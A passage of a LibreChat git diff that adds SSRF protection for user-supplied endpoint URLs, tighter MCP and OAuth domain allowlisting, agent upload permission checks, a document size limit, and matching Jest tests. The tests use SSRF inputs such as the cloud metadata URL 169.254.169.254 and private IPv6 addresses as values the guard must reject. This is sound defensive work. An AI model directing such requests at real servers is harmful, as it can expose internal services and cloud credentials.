expect(validateEndpointURL('http://[fc00::1]/v1', 'test-ep')).rejects.toThrow( + 'targets a restricted address', + ); + }); + + it('should throw for .local TLD hostname', async () => { + await expect(validateEndpointURL('http://myservice.local/v1', 'test-ep')).rejects.toThrow( + 'targets a restricted address', + ); + }); + + it('should throw for .internal TLD hostname', async () => { + await expect(validateEndpointURL('http://api.internal/v1', 'test-ep')).rejects.toThrow( + 'targets a restricted address', + ); + }); + + it('should pass when DNS lookup fails (fail-open)', async () => { + mockedLookup.mockRejectedValueOnce(new Error('ENOTFOUND')); + await expect( + validateEndpointURL('https://nonexistent.example.com/v1', 'test-ep'), + ).resolves.toBeUndefined(); + }); + + it('should throw structured JSON with type invalid_base_url', async () => { + const error = await validateEndpointURL('http://169.254.169.254/latest/', 'my-ep').catch( + (err: Error) => err, + ); + expect(error).toBeInstanceOf(Error); + const parsed = JSON.parse((error as Error).message); + expect(parsed.type).toBe('invalid_base_url'); + expect(parsed.message).toContain('my-ep'); + expect(parsed.message).toContain('targets a restricted address'); + }); +}); diff --git a/packages/api/src/auth/domain.ts b/packages/api/src/auth/domain.ts index 2761a80b55..f5719829d5 100644 --- a/packages/api/src/auth/domain.ts +++ b/packages/api/src/auth/domain.ts @@ -59,6 +59,20 @@ function isPrivateIPv4(a: number, b: number, c: number): boolean { return false; } +/** Checks if a pre-normalized (lowercase, bracket-stripped) IPv6 address falls within fe80::/10 */ +function isIPv6LinkLocal(ipv6: string): boolean { + if (!ipv6.includes(':')) { + return false; + } + const firstHextet = ipv6.split(':', 1)[0]; + if (!firstHextet || !/^[0-9a-f]{1,4}$/.test(firstHextet)) { + return false; + } + const hextet = parseInt(firstHextet, 16); + // /10 mask (0xffc0) preserves top 10 bits: fe80 = 1111_1110_10xx_xxxx + return (hextet 
& 0xffc0) === 0xfe80; +} + /** Checks if an IPv6 address embeds a private IPv4 via 6to4, NAT64, or Teredo */ function hasPrivateEmbeddedIPv4(ipv6: string): boolean { if (!ipv6.startsWith('2002:') && !ipv6.startsWith('64:ff9b::') && !ipv6.startsWith('2001::')) { @@ -132,9 +146,9 @@ export function isPrivateIP(ip: string): boolean { if ( normalized === '::1' || normalized === '::' || - normalized.startsWith('fc') || + normalized.startsWith('fc') || // fc00::/7 — exactly prefixes 'fc' and 'fd' normalized.startsWith('fd') || - normalized.startsWith('fe80') + isIPv6LinkLocal(normalized) // fe80::/10 — spans 0xfe80–0xfebf; bitwise check required ) { return true; } @@ -428,7 +442,10 @@ export async function isActionDomainAllowed( /** * Extracts full domain spec (protocol://hostname:port) from MCP server config URL. * Returns the full origin for proper protocol/port matching against allowedDomains. - * Returns null for stdio transports (no URL) or invalid URLs. + * @returns The full origin string, or null when: + * - No `url` property, non-string, or empty (stdio transport — always allowed upstream) + * - URL string present but cannot be parsed (rejected fail-closed upstream when allowlist active) + * Callers must distinguish these two null cases; see {@link isMCPDomainAllowed}. * @param config - MCP server configuration (accepts any config with optional url field) */ export function extractMCPServerDomain(config: Record): string | null { @@ -452,6 +469,11 @@ export function extractMCPServerDomain(config: Record): string * Validates MCP server domain against allowedDomains. * Supports HTTP, HTTPS, WS, and WSS protocols (per MCP specification). * Stdio transports (no URL) are always allowed. + * Configs with a non-empty URL that cannot be parsed are rejected fail-closed when an + * allowlist is active, preventing template placeholders (e.g. `{{HOST}}`) from bypassing + * domain validation after `processMCPEnv` resolves them at connection time. 
+ * When no allowlist is configured, unparseable URLs fall through to connection-level + * SSRF protection (`createSSRFSafeUndiciConnect`). * @param config - MCP server configuration with optional url field * @param allowedDomains - List of allowed domains (with wildcard support) */ @@ -460,8 +482,18 @@ export async function isMCPDomainAllowed( allowedDomains?: string[] | null, ): Promise { const domain = extractMCPServerDomain(config); + const hasAllowlist = Array.isArray(allowedDomains) && allowedDomains.length > 0; - // Stdio transports don't have domains - always allowed + const hasExplicitUrl = + Object.prototype.hasOwnProperty.call(config, 'url') && + typeof config.url === 'string' && + config.url.trim().length > 0; + + if (!domain && hasExplicitUrl && hasAllowlist) { + return false; + } + + // Stdio transports (no URL) are always allowed if (!domain) { return true; } @@ -469,3 +501,91 @@ export async function isMCPDomainAllowed( // Use MCP_PROTOCOLS (HTTP/HTTPS/WS/WSS) for MCP server validation return isDomainAllowedCore(domain, allowedDomains, MCP_PROTOCOLS); } + +/** + * Checks whether an OAuth URL matches any entry in the MCP allowedDomains list, + * honoring protocol and port constraints when specified by the admin. + * + * Mirrors the allowlist-matching logic of {@link isDomainAllowedCore} (hostname, + * protocol, and explicit-port checks) but is synchronous — no DNS resolution is + * needed because the caller is deciding whether to *skip* the subsequent + * SSRF/DNS checks, not replace them. + * + * @remarks `parseDomainSpec` normalizes `www.` prefixes, so both the input URL + * and allowedDomains entries starting with `www.` are matched without that prefix. 
+ */ +export function isOAuthUrlAllowed(url: string, allowedDomains?: string[] | null): boolean { + if (!Array.isArray(allowedDomains) || allowedDomains.length === 0) { + return false; + } + + const inputSpec = parseDomainSpec(url); + if (!inputSpec) { + return false; + } + + for (const allowedDomain of allowedDomains) { + const allowedSpec = parseDomainSpec(allowedDomain); + if (!allowedSpec) { + continue; + } + if (!hostnameMatches(inputSpec.hostname, allowedSpec)) { + continue; + } + if (allowedSpec.protocol !== null) { + if (inputSpec.protocol === null || inputSpec.protocol !== allowedSpec.protocol) { + continue; + } + } + if (allowedSpec.explicitPort) { + if (!inputSpec.explicitPort || inputSpec.port !== allowedSpec.port) { + continue; + } + } + return true; + } + + return false; +} + +/** Matches ErrorTypes.INVALID_BASE_URL — string literal avoids build-time dependency on data-provider */ +const INVALID_BASE_URL_TYPE = 'invalid_base_url'; + +function throwInvalidBaseURL(message: string): never { + throw new Error(JSON.stringify({ type: INVALID_BASE_URL_TYPE, message })); +} + +/** + * Validates that a user-provided endpoint URL does not target private/internal addresses. + * Throws if the URL is unparseable, uses a non-HTTP(S) scheme, targets a known SSRF hostname, + * or DNS-resolves to a private IP. + * + * @note DNS rebinding: validation performs a single DNS lookup. An adversary controlling + * DNS with TTL=0 could respond with a public IP at validation time and a private IP + * at request time. This is an accepted limitation of point-in-time DNS checks. + * @note Fail-open on DNS errors: a resolution failure here implies a failure at request + * time as well, matching {@link resolveHostnameSSRF} semantics. 
+ */ +export async function validateEndpointURL(url: string, endpoint: string): Promise { + let hostname: string; + let protocol: string; + try { + const parsed = new URL(url); + hostname = parsed.hostname; + protocol = parsed.protocol; + } catch { + throwInvalidBaseURL(`Invalid base URL for ${endpoint}: unable to parse URL.`); + } + + if (protocol !== 'http:' && protocol !== 'https:') { + throwInvalidBaseURL(`Invalid base URL for ${endpoint}: only HTTP and HTTPS are permitted.`); + } + + if (isSSRFTarget(hostname)) { + throwInvalidBaseURL(`Base URL for ${endpoint} targets a restricted address.`); + } + + if (await resolveHostnameSSRF(hostname)) { + throwInvalidBaseURL(`Base URL for ${endpoint} resolves to a restricted address.`); + } +} diff --git a/packages/api/src/cluster/__tests__/LeaderElection.cache_integration.spec.ts b/packages/api/src/cluster/__tests__/LeaderElection.cache_integration.spec.ts index 9bad4dcfac..f1558db795 100644 --- a/packages/api/src/cluster/__tests__/LeaderElection.cache_integration.spec.ts +++ b/packages/api/src/cluster/__tests__/LeaderElection.cache_integration.spec.ts @@ -32,14 +32,22 @@ describe('LeaderElection with Redis', () => { process.setMaxListeners(200); }); - afterEach(async () => { - await Promise.all(instances.map((instance) => instance.resign())); - instances = []; - - // Clean up: clear the leader key directly from Redis + beforeEach(async () => { if (keyvRedisClient) { await keyvRedisClient.del(LeaderElection.LEADER_KEY); } + new LeaderElection().clearRefreshTimer(); + }); + + afterEach(async () => { + try { + await Promise.all(instances.map((instance) => instance.resign())); + } finally { + instances = []; + if (keyvRedisClient) { + await keyvRedisClient.del(LeaderElection.LEADER_KEY); + } + } }); afterAll(async () => { diff --git a/packages/api/src/endpoints/custom/initialize.spec.ts b/packages/api/src/endpoints/custom/initialize.spec.ts new file mode 100644 index 0000000000..911e17c446 --- /dev/null +++ 
b/packages/api/src/endpoints/custom/initialize.spec.ts @@ -0,0 +1,119 @@ +import { AuthType } from 'librechat-data-provider'; +import type { BaseInitializeParams } from '~/types'; + +const mockValidateEndpointURL = jest.fn(); +jest.mock('~/auth', () => ({ + validateEndpointURL: (...args: unknown[]) => mockValidateEndpointURL(...args), +})); + +const mockGetOpenAIConfig = jest.fn().mockReturnValue({ + llmConfig: { model: 'test-model' }, + configOptions: {}, +}); +jest.mock('~/endpoints/openai/config', () => ({ + getOpenAIConfig: (...args: unknown[]) => mockGetOpenAIConfig(...args), +})); + +jest.mock('~/endpoints/models', () => ({ + fetchModels: jest.fn(), +})); + +jest.mock('~/cache', () => ({ + standardCache: jest.fn(() => ({ get: jest.fn().mockResolvedValue(null) })), +})); + +jest.mock('~/utils', () => ({ + isUserProvided: (val: string) => val === 'user_provided', + checkUserKeyExpiry: jest.fn(), +})); + +const mockGetCustomEndpointConfig = jest.fn(); +jest.mock('~/app/config', () => ({ + getCustomEndpointConfig: (...args: unknown[]) => mockGetCustomEndpointConfig(...args), +})); + +import { initializeCustom } from './initialize'; + +function createParams(overrides: { + apiKey?: string; + baseURL?: string; + userBaseURL?: string; + userApiKey?: string; + expiresAt?: string; +}): BaseInitializeParams { + const { apiKey = 'sk-test-key', baseURL = 'https://api.example.com/v1' } = overrides; + + mockGetCustomEndpointConfig.mockReturnValue({ + apiKey, + baseURL, + models: {}, + }); + + const db = { + getUserKeyValues: jest.fn().mockResolvedValue({ + apiKey: overrides.userApiKey ?? 'sk-user-key', + baseURL: overrides.userBaseURL ?? 'https://user-api.example.com/v1', + }), + } as unknown as BaseInitializeParams['db']; + + return { + req: { + user: { id: 'user-1' }, + body: { key: overrides.expiresAt ?? 
'2099-01-01' }, + config: {}, + } as unknown as BaseInitializeParams['req'], + endpoint: 'test-custom', + model_parameters: { model: 'gpt-4' }, + db, + }; +} + +describe('initializeCustom – SSRF guard wiring', () => { + beforeEach(() => { + jest.clearAllMocks(); + }); + + it('should call validateEndpointURL when baseURL is user_provided', async () => { + const params = createParams({ + apiKey: 'sk-test-key', + baseURL: AuthType.USER_PROVIDED, + userBaseURL: 'https://user-api.example.com/v1', + expiresAt: '2099-01-01', + }); + + await initializeCustom(params); + + expect(mockValidateEndpointURL).toHaveBeenCalledTimes(1); + expect(mockValidateEndpointURL).toHaveBeenCalledWith( + 'https://user-api.example.com/v1', + 'test-custom', + ); + }); + + it('should NOT call validateEndpointURL when baseURL is system-defined', async () => { + const params = createParams({ + apiKey: 'sk-test-key', + baseURL: 'https://api.provider.com/v1', + }); + + await initializeCustom(params); + + expect(mockValidateEndpointURL).not.toHaveBeenCalled(); + }); + + it('should propagate SSRF rejection from validateEndpointURL', async () => { + mockValidateEndpointURL.mockRejectedValueOnce( + new Error('Base URL for test-custom targets a restricted address.'), + ); + + const params = createParams({ + apiKey: 'sk-test-key', + baseURL: AuthType.USER_PROVIDED, + userBaseURL: 'http://169.254.169.254/latest/meta-data/', + expiresAt: '2099-01-01', + }); + + await expect(initializeCustom(params)).rejects.toThrow('targets a restricted address'); + expect(mockGetOpenAIConfig).not.toHaveBeenCalled(); + }); +}); diff --git a/packages/api/src/endpoints/custom/initialize.ts b/packages/api/src/endpoints/custom/initialize.ts index 7930b1c12f..15b6b873c7 100644 --- a/packages/api/src/endpoints/custom/initialize.ts +++ b/packages/api/src/endpoints/custom/initialize.ts @@ -9,9 +9,10 @@ import type { TEndpoint } from 'librechat-data-provider'; import type { AppConfig } from '@librechat/data-schemas'; import type { 
BaseInitializeParams, InitializeResultBase, EndpointTokenConfig } from '~/types'; import { getOpenAIConfig } from '~/endpoints/openai/config'; +import { isUserProvided, checkUserKeyExpiry } from '~/utils'; import { getCustomEndpointConfig } from '~/app/config'; import { fetchModels } from '~/endpoints/models'; -import { isUserProvided, checkUserKeyExpiry } from '~/utils'; +import { validateEndpointURL } from '~/auth'; import { standardCache } from '~/cache'; const { PROXY } = process.env; @@ -123,6 +124,10 @@ export async function initializeCustom({ throw new Error(`${endpoint} Base URL not provided.`); } + if (userProvidesURL) { + await validateEndpointURL(baseURL, endpoint); + } + let endpointTokenConfig: EndpointTokenConfig | undefined; const userId = req.user?.id ?? ''; diff --git a/packages/api/src/endpoints/openai/initialize.spec.ts b/packages/api/src/endpoints/openai/initialize.spec.ts new file mode 100644 index 0000000000..ae91571fb3 --- /dev/null +++ b/packages/api/src/endpoints/openai/initialize.spec.ts @@ -0,0 +1,135 @@ +import { AuthType, EModelEndpoint } from 'librechat-data-provider'; +import type { BaseInitializeParams } from '~/types'; + +const mockValidateEndpointURL = jest.fn(); +jest.mock('~/auth', () => ({ + validateEndpointURL: (...args: unknown[]) => mockValidateEndpointURL(...args), +})); + +const mockGetOpenAIConfig = jest.fn().mockReturnValue({ + llmConfig: { model: 'gpt-4' }, + configOptions: {}, +}); +jest.mock('./config', () => ({ + getOpenAIConfig: (...args: unknown[]) => mockGetOpenAIConfig(...args), +})); + +jest.mock('~/utils', () => ({ + getAzureCredentials: jest.fn(), + resolveHeaders: jest.fn(() => ({})), + isUserProvided: (val: string) => val === 'user_provided', + checkUserKeyExpiry: jest.fn(), +})); + +import { initializeOpenAI } from './initialize'; + +function createParams(env: Record): BaseInitializeParams { + const savedEnv: Record = {}; + for (const key of Object.keys(env)) { + savedEnv[key] = process.env[key]; + } + 
Object.assign(process.env, env); + + const db = { + getUserKeyValues: jest.fn().mockResolvedValue({ + apiKey: 'sk-user-key', + baseURL: 'https://user-proxy.example.com/v1', + }), + } as unknown as BaseInitializeParams['db']; + + const params: BaseInitializeParams = { + req: { + user: { id: 'user-1' }, + body: { key: '2099-01-01' }, + config: { endpoints: {} }, + } as unknown as BaseInitializeParams['req'], + endpoint: EModelEndpoint.openAI, + model_parameters: { model: 'gpt-4' }, + db, + }; + + const restore = () => { + for (const key of Object.keys(env)) { + if (savedEnv[key] === undefined) { + delete process.env[key]; + } else { + process.env[key] = savedEnv[key]; + } + } + }; + + return Object.assign(params, { _restore: restore }); +} + +describe('initializeOpenAI – SSRF guard wiring', () => { + afterEach(() => { + jest.clearAllMocks(); + }); + + it('should call validateEndpointURL when OPENAI_REVERSE_PROXY is user_provided', async () => { + const params = createParams({ + OPENAI_API_KEY: 'sk-test', + OPENAI_REVERSE_PROXY: AuthType.USER_PROVIDED, + }); + + try { + await initializeOpenAI(params); + } finally { + (params as unknown as { _restore: () => void })._restore(); + } + + expect(mockValidateEndpointURL).toHaveBeenCalledTimes(1); + expect(mockValidateEndpointURL).toHaveBeenCalledWith( + 'https://user-proxy.example.com/v1', + EModelEndpoint.openAI, + ); + }); + + it('should NOT call validateEndpointURL when OPENAI_REVERSE_PROXY is a system URL', async () => { + const params = createParams({ + OPENAI_API_KEY: 'sk-test', + OPENAI_REVERSE_PROXY: 'https://api.openai.com/v1', + }); + + try { + await initializeOpenAI(params); + } finally { + (params as unknown as { _restore: () => void })._restore(); + } + + expect(mockValidateEndpointURL).not.toHaveBeenCalled(); + }); + + it('should NOT call validateEndpointURL when baseURL is falsy', async () => { + const params = createParams({ + OPENAI_API_KEY: 'sk-test', + }); + + try { + await initializeOpenAI(params); + } 
finally { + (params as unknown as { _restore: () => void })._restore(); + } + + expect(mockValidateEndpointURL).not.toHaveBeenCalled(); + }); + + it('should propagate SSRF rejection from validateEndpointURL', async () => { + mockValidateEndpointURL.mockRejectedValueOnce( + new Error('Base URL for openAI targets a restricted address.'), + ); + + const params = createParams({ + OPENAI_API_KEY: 'sk-test', + OPENAI_REVERSE_PROXY: AuthType.USER_PROVIDED, + }); + + try { + await expect(initializeOpenAI(params)).rejects.toThrow('targets a restricted address'); + } finally { + (params as unknown as { _restore: () => void })._restore(); + } + + expect(mockGetOpenAIConfig).not.toHaveBeenCalled(); + }); +}); diff --git a/packages/api/src/endpoints/openai/initialize.ts b/packages/api/src/endpoints/openai/initialize.ts index 33ce233d34..a6ad6df895 100644 --- a/packages/api/src/endpoints/openai/initialize.ts +++ b/packages/api/src/endpoints/openai/initialize.ts @@ -6,6 +6,7 @@ import type { UserKeyValues, } from '~/types'; import { getAzureCredentials, resolveHeaders, isUserProvided, checkUserKeyExpiry } from '~/utils'; +import { validateEndpointURL } from '~/auth'; import { getOpenAIConfig } from './config'; /** @@ -55,6 +56,10 @@ export async function initializeOpenAI({ ? userValues?.baseURL : baseURLOptions[endpoint as keyof typeof baseURLOptions]; + if (userProvidesURL && baseURL) { + await validateEndpointURL(baseURL, endpoint); + } + const clientOptions: OpenAIConfigOptions = { proxy: PROXY ?? 
undefined, reverseProxyUrl: baseURL || undefined, diff --git a/packages/api/src/files/agents/auth.ts b/packages/api/src/files/agents/auth.ts new file mode 100644 index 0000000000..d9fb2b7423 --- /dev/null +++ b/packages/api/src/files/agents/auth.ts @@ -0,0 +1,113 @@ +import type { IUser } from '@librechat/data-schemas'; +import type { Response } from 'express'; +import type { Types } from 'mongoose'; +import { logger } from '@librechat/data-schemas'; +import { SystemRoles, ResourceType, PermissionBits } from 'librechat-data-provider'; +import type { ServerRequest } from '~/types'; + +export type AgentUploadAuthResult = + | { allowed: true } + | { allowed: false; status: number; error: string; message: string }; + +export interface AgentUploadAuthParams { + userId: string; + userRole: string; + agentId?: string; + toolResource?: string | null; + messageFile?: boolean | string; +} + +export interface AgentUploadAuthDeps { + getAgent: (params: { id: string }) => Promise<{ + _id: string | Types.ObjectId; + author?: string | Types.ObjectId | null; + } | null>; + checkPermission: (params: { + userId: string; + role: string; + resourceType: ResourceType; + resourceId: string | Types.ObjectId; + requiredPermission: number; + }) => Promise; +} + +export async function checkAgentUploadAuth( + params: AgentUploadAuthParams, + deps: AgentUploadAuthDeps, +): Promise { + const { userId, userRole, agentId, toolResource, messageFile } = params; + const { getAgent, checkPermission } = deps; + + const isMessageAttachment = messageFile === true || messageFile === 'true'; + if (!agentId || toolResource == null || isMessageAttachment) { + return { allowed: true }; + } + + if (userRole === SystemRoles.ADMIN) { + return { allowed: true }; + } + + const agent = await getAgent({ id: agentId }); + if (!agent) { + return { allowed: false, status: 404, error: 'Not Found', message: 'Agent not found' }; + } + + if (agent.author?.toString() === userId) { + return { allowed: true }; + } + + const 
hasEditPermission = await checkPermission({ + userId, + role: userRole, + resourceType: ResourceType.AGENT, + resourceId: agent._id, + requiredPermission: PermissionBits.EDIT, + }); + + if (hasEditPermission) { + return { allowed: true }; + } + + logger.warn( + `[agentUploadAuth] User ${userId} denied upload to agent ${agentId} (insufficient permissions)`, + ); + return { + allowed: false, + status: 403, + error: 'Forbidden', + message: 'Insufficient permissions to upload files to this agent', + }; +} + +/** @returns true if denied (response already sent), false if allowed */ +export async function verifyAgentUploadPermission({ + req, + res, + metadata, + getAgent, + checkPermission, +}: { + req: ServerRequest; + res: Response; + metadata: { agent_id?: string; tool_resource?: string | null; message_file?: boolean | string }; + getAgent: AgentUploadAuthDeps['getAgent']; + checkPermission: AgentUploadAuthDeps['checkPermission']; +}): Promise { + const user = req.user as IUser; + const result = await checkAgentUploadAuth( + { + userId: user.id, + userRole: user.role ?? 
'', + agentId: metadata.agent_id, + toolResource: metadata.tool_resource, + messageFile: metadata.message_file, + }, + { getAgent, checkPermission }, + ); + + if (!result.allowed) { + res.status(result.status).json({ error: result.error, message: result.message }); + return true; + } + return false; +} diff --git a/packages/api/src/files/agents/index.ts b/packages/api/src/files/agents/index.ts new file mode 100644 index 0000000000..269586ee8b --- /dev/null +++ b/packages/api/src/files/agents/index.ts @@ -0,0 +1 @@ +export * from './auth'; diff --git a/packages/api/src/files/documents/crud.spec.ts b/packages/api/src/files/documents/crud.spec.ts index f22693718a..f8b255dd5e 100644 --- a/packages/api/src/files/documents/crud.spec.ts +++ b/packages/api/src/files/documents/crud.spec.ts @@ -122,6 +122,30 @@ describe('Document Parser', () => { await expect(parseDocument({ file })).rejects.toThrow('No text found in document'); }); + test('parseDocument() rejects files exceeding the pre-parse size limit', async () => { + const file = { + originalname: 'oversized.docx', + path: path.join(__dirname, 'sample.docx'), + mimetype: 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', + size: 16 * 1024 * 1024, + } as Express.Multer.File; + + await expect(parseDocument({ file })).rejects.toThrow( + /exceeds the 15MB document parser limit \(16MB\)/, + ); + }); + + test('parseDocument() allows files exactly at the size limit boundary', async () => { + const file = { + originalname: 'sample.docx', + path: path.join(__dirname, 'sample.docx'), + mimetype: 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', + size: 15 * 1024 * 1024, + } as Express.Multer.File; + + await expect(parseDocument({ file })).resolves.toBeDefined(); + }); + test('parseDocument() parses empty xlsx with only sheet name', async () => { const file = { originalname: 'empty.xlsx', diff --git a/packages/api/src/files/documents/crud.ts 
b/packages/api/src/files/documents/crud.ts index ab16534b45..61c1956542 100644 --- a/packages/api/src/files/documents/crud.ts +++ b/packages/api/src/files/documents/crud.ts @@ -1,35 +1,39 @@ import * as fs from 'fs'; -import { excelMimeTypes, FileSources } from 'librechat-data-provider'; +import { megabyte, excelMimeTypes, FileSources } from 'librechat-data-provider'; import type { TextItem } from 'pdfjs-dist/types/src/display/api'; import type { MistralOCRUploadResult } from '~/types'; +type FileParseFn = (file: Express.Multer.File) => Promise; + +const DOCUMENT_PARSER_MAX_FILE_SIZE = 15 * megabyte; + /** * Parses an uploaded document and extracts its text content and metadata. * Handled types must stay in sync with `documentParserMimeTypes` from data-provider. * - * @throws {Error} if `file.mimetype` is not handled or no text is found. + * @throws {Error} if `file.mimetype` is not handled, file exceeds size limit, or no text is found. */ export async function parseDocument({ file, }: { file: Express.Multer.File; }): Promise { - let text: string; - if (file.mimetype === 'application/pdf') { - text = await pdfToText(file); - } else if ( - file.mimetype === 'application/vnd.openxmlformats-officedocument.wordprocessingml.document' - ) { - text = await wordDocToText(file); - } else if ( - excelMimeTypes.test(file.mimetype) || - file.mimetype === 'application/vnd.oasis.opendocument.spreadsheet' - ) { - text = await excelSheetToText(file); - } else { + const parseFn = getParserForMimeType(file.mimetype); + if (!parseFn) { throw new Error(`Unsupported file type in document parser: ${file.mimetype}`); } + const fileSize = file.size ?? (file.path != null ? 
(await fs.promises.stat(file.path)).size : 0); + if (fileSize > DOCUMENT_PARSER_MAX_FILE_SIZE) { + const limitMB = DOCUMENT_PARSER_MAX_FILE_SIZE / megabyte; + const sizeMB = Math.ceil(fileSize / megabyte); + throw new Error( + `File "${file.originalname}" exceeds the ${limitMB}MB document parser limit (${sizeMB}MB).`, + ); + } + + const text = await parseFn(file); + if (!text?.trim()) { throw new Error('No text found in document'); } @@ -43,6 +47,23 @@ export async function parseDocument({ }; } +/** Maps a MIME type to its document parser function, or `undefined` if unsupported. */ +function getParserForMimeType(mimetype: string): FileParseFn | undefined { + if (mimetype === 'application/pdf') { + return pdfToText; + } + if (mimetype === 'application/vnd.openxmlformats-officedocument.wordprocessingml.document') { + return wordDocToText; + } + if ( + excelMimeTypes.test(mimetype) || + mimetype === 'application/vnd.oasis.opendocument.spreadsheet' + ) { + return excelSheetToText; + } + return undefined; +} + /** Parses PDF, returns text inside. 
*/ async function pdfToText(file: Express.Multer.File): Promise { // Imported inline so that Jest can test other routes without failing due to loading ESM diff --git a/packages/api/src/files/index.ts b/packages/api/src/files/index.ts index 707f2ef7fb..c3bdb49478 100644 --- a/packages/api/src/files/index.ts +++ b/packages/api/src/files/index.ts @@ -1,3 +1,4 @@ +export * from './agents'; export * from './audio'; export * from './context'; export * from './documents/crud'; diff --git a/packages/api/src/mcp/ConnectionsRepository.ts b/packages/api/src/mcp/ConnectionsRepository.ts index e629934dda..6313faa8d4 100644 --- a/packages/api/src/mcp/ConnectionsRepository.ts +++ b/packages/api/src/mcp/ConnectionsRepository.ts @@ -1,8 +1,9 @@ import { logger } from '@librechat/data-schemas'; -import { MCPConnectionFactory } from '~/mcp/MCPConnectionFactory'; -import { MCPConnection } from './connection'; -import { MCPServersRegistry } from '~/mcp/registry/MCPServersRegistry'; import type * as t from './types'; +import { MCPServersRegistry } from '~/mcp/registry/MCPServersRegistry'; +import { MCPConnectionFactory } from '~/mcp/MCPConnectionFactory'; +import { hasCustomUserVars } from './utils'; +import { MCPConnection } from './connection'; const CONNECT_CONCURRENCY = 3; @@ -76,12 +77,14 @@ export class ConnectionsRepository { await this.disconnect(serverName); } } + const registry = MCPServersRegistry.getInstance(); const connection = await MCPConnectionFactory.create( { serverName, serverConfig, dbSourced: !!(serverConfig as t.ParsedServerConfig).dbId, - useSSRFProtection: MCPServersRegistry.getInstance().shouldEnableSSRFProtection(), + useSSRFProtection: registry.shouldEnableSSRFProtection(), + allowedDomains: registry.getAllowedDomains(), }, this.oauthOpts, ); @@ -139,12 +142,19 @@ export class ConnectionsRepository { return `[MCP][${serverName}]`; } + /** + * App-level (shared) connections cannot serve servers that need per-user context: + * env/header placeholders like 
`{{MY_KEY}}` are only resolved by `processMCPEnv()` + * when real `customUserVars` values exist — which requires a user-level connection. + */ private isAllowedToConnectToServer(config: t.ParsedServerConfig) { if (config.inspectionFailed) { return false; } - //the repository is not allowed to be connected in case the Connection repository is shared (ownerId is undefined/null) and the server requires Auth or startup false. - if (this.ownerId === undefined && (config.startup === false || config.requiresOAuth)) { + if ( + this.ownerId === undefined && + (config.startup === false || config.requiresOAuth || hasCustomUserVars(config)) + ) { return false; } return true; diff --git a/packages/api/src/mcp/MCPConnectionFactory.ts b/packages/api/src/mcp/MCPConnectionFactory.ts index 0fc86e0315..2c16da0760 100644 --- a/packages/api/src/mcp/MCPConnectionFactory.ts +++ b/packages/api/src/mcp/MCPConnectionFactory.ts @@ -30,6 +30,7 @@ export class MCPConnectionFactory { protected readonly logPrefix: string; protected readonly useOAuth: boolean; protected readonly useSSRFProtection: boolean; + protected readonly allowedDomains?: string[] | null; // OAuth-related properties (only set when useOAuth is true) protected readonly userId?: string; @@ -197,6 +198,7 @@ export class MCPConnectionFactory { this.serverName = basic.serverName; this.useOAuth = !!oauth?.useOAuth; this.useSSRFProtection = basic.useSSRFProtection === true; + this.allowedDomains = basic.allowedDomains; this.connectionTimeout = oauth?.connectionTimeout; this.logPrefix = oauth?.user ? 
`[MCP][${basic.serverName}][${oauth.user.id}]` @@ -285,6 +287,8 @@ export class MCPConnectionFactory { serverName: string; identifier: string; clientInfo?: OAuthClientInformation; + storedTokenEndpoint?: string; + storedAuthMethods?: string[]; }, ) => Promise { return async (refreshToken, metadata) => { @@ -294,9 +298,12 @@ export class MCPConnectionFactory { serverUrl: (this.serverConfig as t.SSEOptions | t.StreamableHTTPOptions).url, serverName: metadata.serverName, clientInfo: metadata.clientInfo, + storedTokenEndpoint: metadata.storedTokenEndpoint, + storedAuthMethods: metadata.storedAuthMethods, }, this.serverConfig.oauth_headers ?? {}, this.serverConfig.oauth, + this.allowedDomains, ); }; } @@ -340,6 +347,7 @@ export class MCPConnectionFactory { this.userId!, config?.oauth_headers ?? {}, config?.oauth, + this.allowedDomains, ); if (existingFlow) { @@ -603,6 +611,7 @@ export class MCPConnectionFactory { this.userId!, this.serverConfig.oauth_headers ?? {}, this.serverConfig.oauth, + this.allowedDomains, ); // Store flow state BEFORE redirecting so the callback can find it diff --git a/packages/api/src/mcp/MCPManager.ts b/packages/api/src/mcp/MCPManager.ts index 6fdf45c27a..afb6c68796 100644 --- a/packages/api/src/mcp/MCPManager.ts +++ b/packages/api/src/mcp/MCPManager.ts @@ -100,13 +100,16 @@ export class MCPManager extends UserConnectionManager { const useOAuth = Boolean(serverConfig.requiresOAuth || serverConfig.oauthMetadata); - const useSSRFProtection = MCPServersRegistry.getInstance().shouldEnableSSRFProtection(); + const registry = MCPServersRegistry.getInstance(); + const useSSRFProtection = registry.shouldEnableSSRFProtection(); + const allowedDomains = registry.getAllowedDomains(); const dbSourced = !!serverConfig.dbId; const basic: t.BasicConnectionOptions = { dbSourced, serverName, serverConfig, useSSRFProtection, + allowedDomains, }; if (!useOAuth) { diff --git a/packages/api/src/mcp/UserConnectionManager.ts 
b/packages/api/src/mcp/UserConnectionManager.ts index 76523fc0fc..2e9d5be467 100644 --- a/packages/api/src/mcp/UserConnectionManager.ts +++ b/packages/api/src/mcp/UserConnectionManager.ts @@ -153,12 +153,14 @@ export abstract class UserConnectionManager { logger.info(`[MCP][User: ${userId}][${serverName}] Establishing new connection`); try { + const registry = MCPServersRegistry.getInstance(); connection = await MCPConnectionFactory.create( { serverConfig: config, serverName: serverName, dbSourced: !!config.dbId, - useSSRFProtection: MCPServersRegistry.getInstance().shouldEnableSSRFProtection(), + useSSRFProtection: registry.shouldEnableSSRFProtection(), + allowedDomains: registry.getAllowedDomains(), }, { useOAuth: true, diff --git a/packages/api/src/mcp/__tests__/ConnectionsRepository.test.ts b/packages/api/src/mcp/__tests__/ConnectionsRepository.test.ts index 3b827774d0..7a93960765 100644 --- a/packages/api/src/mcp/__tests__/ConnectionsRepository.test.ts +++ b/packages/api/src/mcp/__tests__/ConnectionsRepository.test.ts @@ -25,6 +25,7 @@ const mockRegistryInstance = { getServerConfig: jest.fn(), getAllServerConfigs: jest.fn(), shouldEnableSSRFProtection: jest.fn().mockReturnValue(false), + getAllowedDomains: jest.fn().mockReturnValue(null), }; jest.mock('../registry/MCPServersRegistry', () => ({ @@ -110,6 +111,7 @@ describe('ConnectionsRepository', () => { serverName: 'server1', serverConfig: mockServerConfigs.server1, useSSRFProtection: false, + allowedDomains: null, dbSourced: false, }, undefined, @@ -133,6 +135,7 @@ describe('ConnectionsRepository', () => { serverName: 'server1', serverConfig: mockServerConfigs.server1, useSSRFProtection: false, + allowedDomains: null, dbSourced: false, }, undefined, @@ -173,6 +176,7 @@ describe('ConnectionsRepository', () => { serverName: 'server1', serverConfig: configWithCachedAt, useSSRFProtection: false, + allowedDomains: null, dbSourced: false, }, undefined, @@ -392,6 +396,36 @@ 